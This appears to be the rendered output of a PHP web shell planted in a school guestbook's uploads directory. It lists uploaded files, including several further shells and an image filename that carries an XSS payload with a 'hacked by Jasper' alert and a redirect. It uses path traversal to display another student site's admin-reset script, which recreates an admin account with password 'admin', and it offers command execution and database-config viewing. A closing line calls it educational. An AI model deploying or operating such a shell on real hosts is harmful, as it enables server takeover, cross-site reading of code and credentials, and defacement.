🐚 WEB SHELL ACTIVATED

📁 File Browser

Current directory: /home/klas4s23/domains/585455.klas4s23.mid-ica.nl/public_html/Gastenboek/uploads

📄 ' onerror='alert(`Gehacked door Jasper!`);window.location.replace(`..`)'.png [view]
📁 ..
📄 003b15869ae62d2ceeee451a5f652dd6.png [view]
📄 0tk5j14v024b1.jpg [view]
📄 300px-Cursed_Cat.jpg [view]
📄 32640-afbeelding-1__ScaleMaxWidthWzYwMF0_CompressedW10.jpg [view]
📄 Bill-Gates-Paul-Allen-2013.jpg [view]
📄 CV Jasper Kramp.png [view]
📄 Cat profile.png [view]
📄 Fronalpstock_big.jpg [view]
📄 Krik en las.jpg [view]
📄 Krik.jpg [view]
📄 Pino-dood-03.jpg [view]
📄 Shellz.php [view]
📄 Ted_Kaczynski_2_(cropped).jpg [view]
📄 Tux.svg.png [view]
📄 Z.png [view]
📄 android.jpg [view]
📄 apple.php [view]
📄 cianancatfish.jpg [view]
📄 downloads (1).jpeg [view]
📄 downloads.jpeg [view]
📄 epresso.jpg [view]
📄 fake_photo.png [view]
📄 hand.jpg [view]
📄 https___dynaimage.cdn.cnn.com_cnn_x_156,y_210,w_1209,h_1612,c_crop_https2F2F5bae1c384db3d70020c01c40%2FfireflyWolfy.jpg [view]
📄 image.png [view]
📄 images.jpeg [view]
📄 info.php [view]
📄 inject.php [view]
📄 instant_redirect.jpg [view]
📄 japper.jpg [view]
📄 koekiemonster-3.jpg [view]
📄 logo.png [view]
📄 muis.jpg [view]
📄 people-call-woman-ugly-responds-with-more-selfies-melissa-blake-1-5d75f249a418b__700.jpg [view]
📄 picobellobv.jpeg [view]
📄 redirect.php [view]
📄 rupsje-nooitgenoeg-knuffel-pluche-42-cm-500x500.jpg [view]
📄 sdfsa.png [view]
📄 sneaky.svg [view]
📄 taylor.webp [view]
📄 test.html [view]
📄 testpreg.php [view]
📄 testpreg1.php [view]
📄 testtest.php.JPG [view]
📄 ultimate_attack.gif [view]
📄 ultimate_attack.php [view]
📄 ultimate_attack.svg [view]
📄 wallpaper.jpg [view]
📄 webshell.php [view]

📄 Viewing: ./../../../../587164.klas4s23.mid-ica.nl/public_html/ELearner/fix_admin.php

<?php
include "db.php";

echo "<h1>Admin User Diagnostic & Repair</h1>";

// 1. Check if admin column exists
try {
    $conn->query("SELECT is_admin FROM users LIMIT 1");
    echo "✅ is_admin column exists in users table.<br><br>";
} catch (PDOException $e) {
    echo "❌ is_admin column does not exist. Adding it now...<br>";
    try {
        $conn->exec("ALTER TABLE users ADD COLUMN is_admin TINYINT(1) NOT NULL DEFAULT 0");
        echo "✅ Added is_admin column to users table.<br><br>";
    } catch (PDOException $e) {
        echo "❌ Error adding column: " . $e->getMessage() . "<br><br>";
    }
}

// 2. Check for existing admin user
$stmt = $conn->prepare("SELECT id, username, password FROM users WHERE username = ?");
$stmt->execute(['admin']);
$admin = $stmt->fetch(PDO::FETCH_ASSOC);

if ($admin) {
    echo "Found existing admin user:<br>";
    echo "- ID: " . $admin['id'] . "<br>";
    echo "- Username: " . $admin['username'] . "<br>";
    echo "- Password hash: " . substr($admin['password'], 0, 20) . "...<br><br>";
    
    // Test if 'admin' password verifies with the stored hash
    if (password_verify('admin', $admin['password'])) {
        echo "✅ Password 'admin' is VALID for this user.<br>";
        echo "The login should work. Try clearing your browser cache and cookies.<br><br>";
    } else {
        echo "❌ Password 'admin' does NOT verify with the stored hash.<br>";
        echo "This explains the login failure.<br><br>";
    }
} else {
    echo "❌ No admin user found in the database.<br><br>";
}

// Provide repair options
echo "<h2>Repair Options:</h2>";

if (isset($_GET['repair'])) {
    echo "<h3>Performing Repairs...</h3>";
    
    // Delete existing admin if present
    if ($admin) {
        $stmt = $conn->prepare("DELETE FROM users WHERE username = ?");
        $stmt->execute(['admin']);
        echo "✅ Deleted existing admin user.<br>";
    }
    
    // Create new admin user with correct hash
    $password_hash = password_hash('admin', PASSWORD_DEFAULT);
    try {
        $stmt = $conn->prepare("INSERT INTO users (username, password, is_admin) VALUES (?, ?, 1)");
        $stmt->execute(['admin', $password_hash]);
        echo "✅ Created new admin user with username 'admin' and password 'admin'.<br>";
        echo "✅ Password hash: " . substr($password_hash, 0, 20) . "...<br>";
        
        // Verify the new hash works
        if (password_verify('admin', $password_hash)) {
            echo "✅ Verified that password 'admin' works with the new hash.<br><br>";
        }
    } catch (PDOException $e) {
        echo "❌ Error creating admin user: " . $e->getMessage() . "<br><br>";
    }
    
    echo "<p><strong>Login should now work! <a href='login.php'>Try logging in now</a> with:</strong><br>";
    echo "Username: admin<br>";
    echo "Password: admin</p>";
} else {
    echo "<p><a href='?repair=1' style='display:inline-block; padding:10px; background-color:#ff5722; color:white; text-decoration:none; border-radius:4px;'>Recreate Admin User</a></p>";
    echo "<p>This will delete the existing admin user (if any) and create a new one with the username 'admin' and password 'admin'.</p>";
}
?>

🎯 Available Actions

Command Execution:

Quick Commands:

📋 List files | 👤 Show user | 📍 Show directory | 🔄 Show processes | 🔐 Show users

File Operations:

⬆️ Parent directory | 🏠 Root directory | 🔍 View DB config
⚠️ Educational Warning: This demonstrates a web shell vulnerability. In a real attack, this could allow complete server compromise!